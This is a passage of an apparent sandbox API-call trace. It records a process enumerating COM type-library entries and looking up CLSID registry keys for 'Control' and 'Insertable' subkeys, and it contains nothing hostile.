This=0xb4cc0f0, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.758] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cc0f0) returned 0x0 [0030.758] IUnknown:Release (This=0xb4cc0f0) returned 0x1 [0030.758] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x8, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc1a0) returned 0x0 [0030.758] IUnknown:Release (This=0x7809f68) returned 0x2 [0030.758] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cc1a0, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.758] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cc1a0) returned 0x0 [0030.758] IUnknown:Release (This=0xb4cc1a0) returned 0x1 [0030.758] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x9, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc250) returned 0x0 [0030.759] IUnknown:Release (This=0x7809fc8) returned 0x2 [0030.759] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cc250, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.759] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cc250) returned 0x0 [0030.759] IUnknown:Release (This=0xb4cc250) returned 0x1 [0030.759] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0xa, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc300) returned 0x0 [0030.760] IUnknown:Release (This=0x780a028) returned 0x2 [0030.760] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cc300, ppTypeAttr=0x2e6a20, pDummy=0x10005c001aa | out: ppTypeAttr=0x2e6a20, pDummy=0x10005c001aa) returned 0x0 [0030.760] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cc300) returned 0x0 [0030.760] IUnknown:Release (This=0xb4cc300) returned 0x1 [0030.760] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0xb, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc3b0) returned 0x0 [0030.760] IUnknown:Release (This=0x7809c68) returned 0x2 [0030.761] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cc3b0, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.761] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cc3b0) returned 0x0 [0030.761] IUnknown:Release (This=0xb4cc3b0) returned 0x1 [0030.761] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0xc, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc460) returned 0x0 [0030.761] IUnknown:Release (This=0x7809c08) returned 0x2 [0030.761] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cc460, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.761] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cc460) returned 0x0 [0030.761] IUnknown:Release (This=0xb4cc460) returned 0x1 [0030.761] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0xd, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc510) returned 0x0 [0030.762] IUnknown:Release (This=0x780a088) returned 0x2 [0030.762] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cc510, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.762] wcscpy_s (in: _Destination=0x2e68e0, _SizeInWords=0x2e, _Source="Clsid\\" | out: _Destination="Clsid\\") returned 0x0 [0030.762] StringFromGUID2 (in: rguid=0xb46ec38*(Data1=0x82b02373, Data2=0xb5bc, Data3=0x11cf, Data4=([0]=0x81, [1]=0xf, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x3, [6]=0x0, [7]=0x74)), lpsz=0x2e68ec, cchMax=39 | out: lpsz="{82B02373-B5BC-11CF-810F-00A0C9030074}") returned 39 [0030.762] RegOpenKeyW (in: hKey=0xffffffff80000000, lpSubKey="Clsid\\{82B02373-B5BC-11CF-810F-00A0C9030074}", phkResult=0x2e68b8 | out: phkResult=0x2e68b8*=0xa3e) returned 0x0 [0030.762] RegOpenKeyW (in: hKey=0xa3e, lpSubKey="Control", phkResult=0x2e68c0 | out: phkResult=0x2e68c0*=0x0) returned 0x2 [0030.763] RegOpenKeyW (in: hKey=0xa3e, lpSubKey="Insertable", phkResult=0x2e68c0 | out: phkResult=0x2e68c0*=0x0) returned 0x2 [0030.763] RegCloseKey (hKey=0xa3e) returned 0x0 [0030.763] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cc510) returned 0x0 [0030.763] IUnknown:Release (This=0xb4cc510) returned 0x1 [0030.763] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0xe, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc568) returned 0x0 [0030.763] IUnknown:Release (This=0x780a0e8) returned 0x2 [0030.764] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cc568, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.764] wcscpy_s (in: _Destination=0x2e68e0, _SizeInWords=0x2e, _Source="Clsid\\" | out: _Destination="Clsid\\") returned 0x0 [0030.764] StringFromGUID2 (in: rguid=0xb46ec38*(Data1=0x82b02374, Data2=0xb5bc, Data3=0x11cf, Data4=([0]=0x81, [1]=0xf, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x3, [6]=0x0, [7]=0x74)), lpsz=0x2e68ec, cchMax=39 | out: lpsz="{82B02374-B5BC-11CF-810F-00A0C9030074}") returned 39 [0030.764] RegOpenKeyW (in: hKey=0xffffffff80000000, lpSubKey="Clsid\\{82B02374-B5BC-11CF-810F-00A0C9030074}", phkResult=0x2e68b8 | out: phkResult=0x2e68b8*=0xa3e) returned 0x0 [0030.764] RegOpenKeyW (in: hKey=0xa3e, lpSubKey="Control", phkResult=0x2e68c0 | out: phkResult=0x2e68c0*=0x0) returned 0x2 [0030.764] RegOpenKeyW (in: hKey=0xa3e, lpSubKey="Insertable", phkResult=0x2e68c0 | out: phkResult=0x2e68c0*=0x0) returned 0x2 [0030.765] RegCloseKey (hKey=0xa3e) returned 0x0 [0030.765] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cc568) returned 0x0 [0030.765] IUnknown:Release (This=0xb4cc568) returned 0x1 [0030.765] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0xf, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc5c0) returned 0x0 [0030.765] IUnknown:Release (This=0x780a268) returned 0x2 [0030.765] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cc5c0, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.765] wcscpy_s (in: _Destination=0x2e68e0, _SizeInWords=0x2e, _Source="Clsid\\" | out: _Destination="Clsid\\") returned 0x0 [0030.765] StringFromGUID2 (in: rguid=0xb46ec38*(Data1=0x82b02375, Data2=0xb5bc, Data3=0x11cf, Data4=([0]=0x81, [1]=0xf, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x3, [6]=0x0, [7]=0x74)), lpsz=0x2e68ec, cchMax=39 | out: lpsz="{82B02375-B5BC-11CF-810F-00A0C9030074}") returned 39 [0030.765] RegOpenKeyW (in: hKey=0xffffffff80000000, lpSubKey="Clsid\\{82B02375-B5BC-11CF-810F-00A0C9030074}", phkResult=0x2e68b8 | out: phkResult=0x2e68b8*=0xa3e) returned 0x0 [0030.766] RegOpenKeyW (in: hKey=0xa3e, lpSubKey="Control", phkResult=0x2e68c0 | out: phkResult=0x2e68c0*=0x0) returned 0x2 [0030.766] RegOpenKeyW (in: hKey=0xa3e, lpSubKey="Insertable", phkResult=0x2e68c0 | out: phkResult=0x2e68c0*=0x0) returned 0x2 [0030.766] RegCloseKey (hKey=0xa3e) returned 0x0 [0030.766] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cc5c0) returned 0x0 [0030.766] IUnknown:Release (This=0xb4cc5c0) returned 0x1 [0030.766] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x10, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc618) returned 0x0 [0030.767] IUnknown:Release (This=0x780a3e8) returned 0x2 [0030.767] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cc618, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.767] wcscpy_s (in: _Destination=0x2e68e0, _SizeInWords=0x2e, _Source="Clsid\\" | out: _Destination="Clsid\\") returned 0x0 [0030.767] StringFromGUID2 (in: rguid=0xb46ec38*(Data1=0x8a683c92, Data2=0xba84, Data3=0x11cf, Data4=([0]=0x81, [1]=0x10, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x3, [6]=0x0, [7]=0x74)), lpsz=0x2e68ec, cchMax=39 | out: lpsz="{8A683C92-BA84-11CF-8110-00A0C9030074}") returned 39 [0030.767] RegOpenKeyW (in: hKey=0xffffffff80000000, lpSubKey="Clsid\\{8A683C92-BA84-11CF-8110-00A0C9030074}", phkResult=0x2e68b8 | out: phkResult=0x2e68b8*=0xa3e) returned 0x0 [0030.767] RegOpenKeyW (in: hKey=0xa3e, lpSubKey="Control", phkResult=0x2e68c0 | out: phkResult=0x2e68c0*=0x0) returned 0x2 [0030.767] RegOpenKeyW (in: hKey=0xa3e, lpSubKey="Insertable", phkResult=0x2e68c0 | out: phkResult=0x2e68c0*=0x0) returned 0x2 [0030.768] RegCloseKey (hKey=0xa3e) returned 0x0 [0030.768] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cc618) returned 0x0 [0030.768] IUnknown:Release (This=0xb4cc618) returned 0x1 [0030.768] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x11, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc670) returned 0x0 [0030.768] IUnknown:Release (This=0x780a568) returned 0x2 [0030.768] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cc670, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.768] wcscpy_s (in: _Destination=0x2e68e0, _SizeInWords=0x2e, _Source="Clsid\\" | out: _Destination="Clsid\\") returned 0x0 [0030.768] StringFromGUID2 (in: rguid=0xb46ec38*(Data1=0x8a683c93, Data2=0xba84, Data3=0x11cf, Data4=([0]=0x81, [1]=0x10, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x3, [6]=0x0, [7]=0x74)), lpsz=0x2e68ec, cchMax=39 | out: lpsz="{8A683C93-BA84-11CF-8110-00A0C9030074}") returned 39 [0030.768] RegOpenKeyW (in: hKey=0xffffffff80000000, lpSubKey="Clsid\\{8A683C93-BA84-11CF-8110-00A0C9030074}", phkResult=0x2e68b8 | out: phkResult=0x2e68b8*=0xa3e) returned 0x0 [0030.769] RegOpenKeyW (in: hKey=0xa3e, lpSubKey="Control", phkResult=0x2e68c0 | out: phkResult=0x2e68c0*=0x0) returned 0x2 [0030.769] RegOpenKeyW (in: hKey=0xa3e, lpSubKey="Insertable", phkResult=0x2e68c0 | out: phkResult=0x2e68c0*=0x0) returned 0x2 [0030.769] RegCloseKey (hKey=0xa3e) returned 0x0 [0030.769] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cc670) returned 0x0 [0030.769] IUnknown:Release (This=0xb4cc670) returned 0x1 [0030.769] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x12, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc6c8) returned 0x0 [0030.770] IUnknown:Release (This=0x780a6e8) returned 0x2 [0030.770] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cc6c8, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.770] wcscpy_s (in: _Destination=0x2e68e0, _SizeInWords=0x2e, _Source="Clsid\\" | out: _Destination="Clsid\\") returned 0x0 [0030.770] StringFromGUID2 (in: rguid=0xb46ec38*(Data1=0x1c3b4210, Data2=0xf441, Data3=0x11ce, Data4=([0]=0xb9, [1]=0xea, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x6b, [6]=0x1a, [7]=0x69)), lpsz=0x2e68ec, cchMax=39 | out: lpsz="{1C3B4210-F441-11CE-B9EA-00AA006B1A69}") returned 39 [0030.770] RegOpenKeyW (in: hKey=0xffffffff80000000, lpSubKey="Clsid\\{1C3B4210-F441-11CE-B9EA-00AA006B1A69}", phkResult=0x2e68b8 | out: phkResult=0x2e68b8*=0xa52) returned 0x0 [0030.770] RegOpenKeyW (in: hKey=0xa52, lpSubKey="Control", phkResult=0x2e68c0 | out: phkResult=0x2e68c0*=0x0) returned 0x2 [0030.770] RegOpenKeyW (in: hKey=0xa52, lpSubKey="Insertable", phkResult=0x2e68c0 | out: phkResult=0x2e68c0*=0x0) returned 0x2 [0030.771] RegCloseKey (hKey=0xa52) returned 0x0 [0030.771] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cc6c8) returned 0x0 [0030.771] IUnknown:Release (This=0xb4cc6c8) returned 0x1 [0030.771] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x13, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc720) returned 0x0 [0030.771] IUnknown:Release (This=0x780a868) returned 0x2 [0030.771] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cc720, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.771] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cc720) returned 0x0 [0030.771] IUnknown:Release (This=0xb4cc720) returned 0x1 [0030.771] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x14, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc778) returned 0x0 [0030.771] IUnknown:Release (This=0x780a9e8) returned 0x2 [0030.771] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cc778, ppTypeAttr=0x2e6a20, pDummy=0xd1007b0050 | out: ppTypeAttr=0x2e6a20, pDummy=0xd1007b0050) returned 0x0 [0030.771] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cc778) returned 0x0 [0030.771] IUnknown:Release (This=0xb4cc778) returned 0x1 [0030.771] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x15, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc7d0) returned 0x0 [0030.772] IUnknown:Release (This=0x780aa48) returned 0x2 [0030.772] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cc7d0, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.772] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cc7d0) returned 0x0 [0030.772] IUnknown:Release (This=0xb4cc7d0) returned 0x1 [0030.772] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x16, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc828) returned 0x0 [0030.772] IUnknown:Release (This=0x780aaa8) returned 0x2 [0030.772] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cc828, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.772] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cc828) returned 0x0 [0030.772] IUnknown:Release (This=0xb4cc828) returned 0x1 [0030.772] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x17, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc880) returned 0x0 [0030.772] IUnknown:Release (This=0x780ab08) returned 0x2 [0030.772] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cc880, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.772] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cc880) returned 0x0 [0030.773] IUnknown:Release (This=0xb4cc880) returned 0x1 [0030.773] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x18, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc8d8) returned 0x0 [0030.773] IUnknown:Release (This=0x780ab68) returned 0x2 [0030.773] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cc8d8, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.773] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cc8d8) returned 0x0 [0030.773] IUnknown:Release (This=0xb4cc8d8) returned 0x1 [0030.773] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x19, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc930) returned 0x0 [0030.773] IUnknown:Release (This=0x780abc8) returned 0x2 [0030.773] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cc930, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.773] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cc930) returned 0x0 [0030.773] IUnknown:Release (This=0xb4cc930) returned 0x1 [0030.773] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x1a, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc988) returned 0x0 [0030.773] IUnknown:Release (This=0x780ac28) returned 0x2 [0030.774] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cc988, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.774] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cc988) returned 0x0 [0030.774] IUnknown:Release (This=0xb4cc988) returned 0x1 [0030.774] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x1b, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cc9e0) returned 0x0 [0030.774] IUnknown:Release (This=0x780ac88) returned 0x2 [0030.774] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cc9e0, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.774] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cc9e0) returned 0x0 [0030.774] IUnknown:Release (This=0xb4cc9e0) returned 0x1 [0030.774] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x1c, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cca38) returned 0x0 [0030.774] IUnknown:Release (This=0x780ace8) returned 0x2 [0030.774] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cca38, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.774] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cca38) returned 0x0 [0030.774] IUnknown:Release (This=0xb4cca38) returned 0x1 [0030.774] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x1d, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cca90) returned 0x0 [0030.775] IUnknown:Release (This=0x780ad48) returned 0x2 [0030.775] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cca90, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.775] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cca90) returned 0x0 [0030.775] IUnknown:Release (This=0xb4cca90) returned 0x1 [0030.775] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x1e, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ccae8) returned 0x0 [0030.775] IUnknown:Release (This=0x780ada8) returned 0x2 [0030.775] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ccae8, ppTypeAttr=0x2e6a20, pDummy=0x880142002a | out: ppTypeAttr=0x2e6a20, pDummy=0x880142002a) returned 0x0 [0030.775] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ccae8) returned 0x0 [0030.775] IUnknown:Release (This=0xb4ccae8) returned 0x1 [0030.775] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x1f, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ccb40) returned 0x0 [0030.776] IUnknown:Release (This=0x780ae08) returned 0x2 [0030.776] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ccb40, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.776] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ccb40) returned 0x0 [0030.776] IUnknown:Release (This=0xb4ccb40) returned 0x1 [0030.776] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x20, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ccb98) returned 0x0 [0030.776] IUnknown:Release (This=0x780ae68) returned 0x2 [0030.776] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ccb98, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.776] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ccb98) returned 0x0 [0030.776] IUnknown:Release (This=0xb4ccb98) returned 0x1 [0030.776] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x21, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ccbf0) returned 0x0 [0030.776] IUnknown:Release (This=0x780aec8) returned 0x2 [0030.776] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ccbf0, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.776] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ccbf0) returned 0x0 [0030.776] IUnknown:Release (This=0xb4ccbf0) returned 0x1 [0030.776] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x22, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ccc48) returned 0x0 [0030.777] IUnknown:Release (This=0x780af28) returned 0x2 [0030.777] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ccc48, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.777] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ccc48) returned 0x0 [0030.777] IUnknown:Release (This=0xb4ccc48) returned 0x1 [0030.777] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x23, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ccca0) returned 0x0 [0030.777] IUnknown:Release (This=0x780af88) returned 0x2 [0030.777] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ccca0, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.777] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ccca0) returned 0x0 [0030.777] IUnknown:Release (This=0xb4ccca0) returned 0x1 [0030.777] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x24, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cccf8) returned 0x0 [0030.777] IUnknown:Release (This=0x780afe8) returned 0x2 [0030.777] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cccf8, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.777] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cccf8) returned 0x0 [0030.777] IUnknown:Release (This=0xb4cccf8) returned 0x1 [0030.777] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x25, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ccd50) returned 0x0 [0030.777] IUnknown:Release (This=0x780b048) returned 0x2 [0030.778] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ccd50, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.778] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ccd50) returned 0x0 [0030.778] IUnknown:Release (This=0xb4ccd50) returned 0x1 [0030.778] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x26, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ccda8) returned 0x0 [0030.778] IUnknown:Release (This=0x780b0a8) returned 0x2 [0030.778] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ccda8, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.778] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ccda8) returned 0x0 [0030.778] IUnknown:Release (This=0xb4ccda8) returned 0x1 [0030.778] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x27, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cce58) returned 0x0 [0030.778] IUnknown:Release (This=0x780b108) returned 0x2 [0030.778] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cce58, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.778] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cce58) returned 0x0 [0030.778] IUnknown:Release (This=0xb4cce58) returned 0x1 [0030.778] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x28, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ccf08) returned 0x0 [0030.778] IUnknown:Release (This=0x780b168) returned 0x2 [0030.778] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ccf08, ppTypeAttr=0x2e6a20, pDummy=0x801d00001 | out: ppTypeAttr=0x2e6a20, pDummy=0x801d00001) returned 0x0 [0030.779] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ccf08) returned 0x0 [0030.779] IUnknown:Release (This=0xb4ccf08) returned 0x1 [0030.779] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x29, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4ccfb8) returned 0x0 [0030.779] IUnknown:Release (This=0x780b1c8) returned 0x2 [0030.779] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4ccfb8, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.779] ITypeInfo:LocalReleaseTypeAttr (This=0xb4ccfb8) returned 0x0 [0030.779] IUnknown:Release (This=0xb4ccfb8) returned 0x1 [0030.779] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x2a, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd068) returned 0x0 [0030.779] IUnknown:Release (This=0x780b228) returned 0x2 [0030.779] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cd068, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.779] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cd068) returned 0x0 [0030.779] IUnknown:Release (This=0xb4cd068) returned 0x1 [0030.779] ITypeLib:GetTypeInfo (in: This=0x782b300, index=0x2b, ppTInfo=0x2e69d8 | out: ppTInfo=0x2e69d8*=0xb4cd0c0) returned 0x0 [0030.779] IUnknown:Release (This=0x780b288) returned 0x2 [0030.779] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4cd0c0, ppTypeAttr=0x2e6a20, pDummy=0x0 | out: ppTypeAttr=0x2e6a20, pDummy=0x0) returned 0x0 [0030.779] wcscpy_s (in: _Destination=0x2e68e0, _SizeInWords=0x2e, _Source="Clsid\\" | out: _Destination="Clsid\\") returned 0x0 [0030.779] StringFromGUID2 (in: rguid=0xb46ec38*(Data1=0x909e0ae0, Data2=0x16dc, Data3=0x11ce, Data4=([0]=0x9e, [1]=0x98, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x57, [6]=0x4a, [7]=0x4f)), lpsz=0x2e68ec, cchMax=39 | out: lpsz="{909E0AE0-16DC-11CE-9E98-00AA00574A4F}") returned 39 [0030.779] RegOpenKeyW (in: hKey=0xffffffff80000000, lpSubKey="Clsid\\{909E0AE0-16DC-11CE-9E98-00AA00574A4F}", phkResult=0x2e68b8 | out: phkResult=0x2e68b8*=0xa52) returned 0x0 [0030.780] RegOpenKeyW (in: hKey=0xa52, lpSubKey="Control", phkResult=0x2e68c0 | out: phkResult=0x2e68c0*=0x0) returned 0x2 [0030.780] RegOpenKeyW (in: hKey=0xa52, lpSubKey="Insertable", phkResult=0x2e68c0 | out: phkResult=0x2e68c0*=0x0) returned 0x2 [0030.780] RegCloseKey (hKey=0xa52) returned 0x0 [0030.780] ITypeInfo:LocalReleaseTypeAttr (This=0xb4cd0c0) returned 0x0 [0030.780] IUnknown:Release (This=0xb4cd0c0) returned 0x1 [0030.780] 